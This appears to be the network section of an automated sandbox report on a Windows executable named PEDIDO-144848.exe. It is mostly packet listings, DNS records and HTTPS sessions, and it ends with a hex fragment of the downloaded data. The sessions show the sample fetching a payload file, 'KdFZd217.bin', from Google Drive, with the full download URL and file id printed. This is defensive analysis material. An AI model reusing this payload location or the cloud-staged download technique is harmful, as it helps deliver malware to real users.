                                                      Oct 7, 2024 19:26:01.133748055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.133950949 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.136481047 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.136687994 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.136698961 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.136869907 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.139391899 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.139580011 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.139589071 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.139761925 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.142031908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.142188072 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.142198086 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.142328978 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.144766092 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.144987106 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.145155907 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.145349979 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.147407055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.147623062 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.148044109 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.148255110 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.150315046 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.150495052 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.150506020 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.150702000 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.153043032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.153228998 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.153353930 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.153523922 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.155539989 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.155725002 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.155735016 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.155919075 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.158272982 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.158451080 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.158461094 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.158684015 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.160928011 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.161115885 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.161125898 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.161257982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.163229942 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.163378000 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.163387060 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.163520098 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.165939093 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.166081905 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.167119980 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.167316914 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.167326927 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.167485952 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.169680119 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.169857025 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.169867992 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.170038939 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.172194004 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.172336102 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.172353029 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.172555923 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.174752951 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.174968958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.174979925 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.175190926 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.177493095 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.177625895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.177635908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.177767992 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.179779053 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.179928064 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.179974079 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.180121899 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.182296991 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.182574034 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.182585001 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.182878971 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.184828997 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.185010910 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.185023069 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.185257912 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.187031984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.187222958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.187237978 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.187417030 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.189409018 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.189618111 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.189629078 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.189837933 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.191683054 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.191863060 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.191876888 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.192058086 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.193857908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.194046974 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.194075108 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.194256067 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.196433067 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.196611881 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.197535038 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.197711945 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.197722912 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.197932959 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.200047016 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.200258970 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.200269938 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.200448990 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.201760054 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.201915979 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.201925039 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.202101946 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.204078913 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.204226017 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.204237938 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.204411030 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.206130981 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.206279993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.206290960 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.206422091 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.208251953 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.208467960 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.208478928 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.208653927 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.210238934 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.210397959 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.210407019 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.210598946 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.212507010 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.212702036 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.212712049 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.212882996 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.214400053 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.214665890 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.214674950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.214865923 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.216334105 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.216527939 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.216538906 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.216824055 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.218538046 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.218720913 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.218733072 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.218928099 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.220170975 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.220359087 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.220367908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.220540047 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.222795963 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.222945929 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.223491907 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.223663092 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.223678112 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.223869085 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.225008965 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.225188017 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.225198984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.225337982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.227356911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.227509022 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.227519989 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.227663994 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.228579998 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.228730917 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.228849888 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.228966951 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.230441093 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.230591059 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.230663061 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.230798006 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.232376099 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.232578993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.232590914 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.232774973 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.233892918 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.234086990 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.234097004 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.234272003 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.235690117 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.235933065 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.235943079 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.236114025 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.237411022 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.237613916 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.237624884 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.237829924 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.239033937 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.239209890 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.239224911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.239429951 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.240812063 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.241003036 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.241013050 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.241234064 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.242708921 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.242849112 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.243036032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.243174076 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.244432926 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.244590998 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.244602919 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.244735003 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.245754957 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.245892048 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.245903015 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.246047020 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.247383118 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.247539043 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.247553110 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.247684956 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.249439955 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.249596119 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.249605894 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.249738932 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.250571966 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.250754118 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.250766039 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.250919104 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.252311945 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.252507925 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.252520084 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.252721071 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.253860950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.254043102 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.254054070 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.254240990 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.255218029 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.255393982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.255403042 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.255575895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.256598949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.256772995 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.256784916 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.257006884 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.258050919 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.258240938 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.258249998 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.258423090 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.259491920 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.259589911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.259670973 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.259773970 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.259825945 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.259835958 CEST44349749142.251.40.97192.168.11.20

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 7, 2024 19:25:57.590415955 CEST5607153192.168.11.201.1.1.1
                                                      Oct 7, 2024 19:25:57.687294006 CEST53560711.1.1.1192.168.11.20
                                                      Oct 7, 2024 19:25:58.228408098 CEST5055253192.168.11.201.1.1.1
                                                      Oct 7, 2024 19:25:58.323803902 CEST53505521.1.1.1192.168.11.20

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 7, 2024 19:25:57.590415955 CEST192.168.11.201.1.1.10x51dfStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Oct 7, 2024 19:25:58.228408098 CEST192.168.11.201.1.1.10xb8d9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 7, 2024 19:25:57.687294006 CEST1.1.1.1192.168.11.200x51dfNo error (0)drive.google.com142.250.80.46A (IP address)IN (0x0001)false
                                                      Oct 7, 2024 19:25:58.323803902 CEST1.1.1.1192.168.11.200xb8d9No error (0)drive.usercontent.google.com142.251.40.97A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.11.2049748142.250.80.464437228C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-07 17:25:57 UTC216OUTGET /uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-10-07 17:25:58 UTC1610INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Mon, 07 Oct 2024 17:25:58 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-rYuhXGrY6aYEFAJ7NtjEiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.11.2049749142.251.40.974437228C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-07 17:25:58 UTC258OUTGET /download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-07 17:26:00 UTC4885INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="KdFZd217.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 288320
                                                      Last-Modified: Mon, 07 Oct 2024 08:58:50 GMT
                                                      X-GUploader-UploadID: AD-8ljubrGPyjnpmSEv5rEhSo1ej1MB9gNOvN02gHFPKne77PEmTtdqZzEhBjOd90GAHcVYIwzU
                                                      Date: Mon, 07 Oct 2024 17:26:00 GMT
                                                      Expires: Mon, 07 Oct 2024 17:26:00 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=nf9fbA==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-10-07 17:26:00 UTC4885INData Raw: 2a 7d 0d 7b 7e 9c 72 1f e1 93 fa df 3b 0f ad 46 61 ce 6f 79 da 37 a9 48 5a b0 28 02 2e 88 88 6c 38 3d 02 19 3e 59 17 62 23 39 48 c5 e6 fe a9 78 e2 0e ae 63 97 ea a0 a3 1d 94 40 6d ea 4a e1 b4 37 b9 df 8a 2c 6c b0 55 d7 fe 67 04 6c 6d 90 fe e6 24 2c e4 f2 9e 28 2d 6e 65 90 4b cd be f9 cd b2 3b 00 24 87 38 d7 44 a8 3b 36 2c c7 b1 89 a2 04 21 9e a1 36 9d bf be 70 e4 2d 89 bd 6a 8d 6a 83 00 a4 e3 5f 36 5f 22 a2 f1 53 f3 50 9c b3 cc 70 90 47 12 ef 7e 3f 20 14 0e 29 79 41 3c 4f 61 c4 79 51 7d df cf 69 f6 ee 2b 18 46 54 4b a5 ad 9c fe 8f cf 44 fc 37 37 2d 94 99 36 e5 08 21 2e d0 23 2a 69 07 0e 2f be 81 1f 0c 08 be b8 df 3e 90 49 83 7c 2a 79 69 05 9f 68 63 87 ff c4 5b 96 6a 05 fc 94 d0 04 7f 7e 64 14 29 9c 6e 9e 88 ff 5e ec c9 22 47 d5 8a 8f f9 56 88 53 49 7f 25
